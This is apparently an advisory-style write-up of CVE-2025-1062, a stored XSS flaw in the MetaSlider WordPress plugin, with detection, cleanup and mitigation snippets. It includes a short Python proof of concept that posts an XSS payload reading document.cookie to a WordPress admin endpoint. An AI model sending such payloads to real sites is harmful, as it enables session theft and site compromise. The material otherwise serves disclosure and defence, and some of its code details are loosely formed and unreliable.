How CVE-2025-1062 Works
The vulnerability exists in MetaSlider WordPress plugin versions before 3.95.0 where improper input sanitization of plugin settings allows authenticated attackers with admin privileges to inject malicious JavaScript payloads. These payloads are stored in the database and executed when other users access affected slideshow components. The attack bypasses WordPress multisite security restrictions like unfiltered_html capability checks. The XSS triggers through crafted slider/gallery parameters that aren’t sanitized during save operations, persisting the attack vector across page reloads.
DailyCVE Form
Platform: WordPress
Version: <3.95.0
Vulnerability: Stored XSS
Severity: High
Date: 04/08/2025
What Undercode Say:
Proof of Concept (PoC)
import requests
wordpress_url = "http://target.com/wp-admin/admin-post.php"
payload = "<svg/onload=alert(document.cookie)>"
params = {
'action': 'save_ms_settings',
'settings': f'{{"test_setting":"{payload}"}}'
}
Requires admin credentials
response = requests.post(wordpress_url,
data=params,
cookies={'wordpress_logged_in': 'admin_cookie'})
Detection Command wpscan --url http://target.com --enumerate vp --plugins-detection mixed
-- Database cleanup (Post-exploitation) DELETE FROM wp_postmeta WHERE meta_key LIKE '%metaslider%' AND meta_value LIKE '%<script%';
Mitigation Rule
location ~ /wp-content/plugins/metaslider/ {
add_header Content-Security-Policy "default-src 'self'";
add_header X-XSS-Protection "1; mode=block";
}
// Temporary patch
add_filter('metaslider_save_settings', function($settings) {
return array_map('wp_strip_all_tags', $settings);
}, 10, 1);
Upgrade path:
wp plugin update metaslider --version=3.95.0
// Browser protection
if(window.location.pathname.includes('metaslider')) {
document.addEventListener('DOMContentLoaded', () => {
document.querySelectorAll('[id^="metaslider"]').forEach(el => {
el.innerHTML = el.textContent;
});
});
}
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-1062
Extra Source Hub:
Undercode
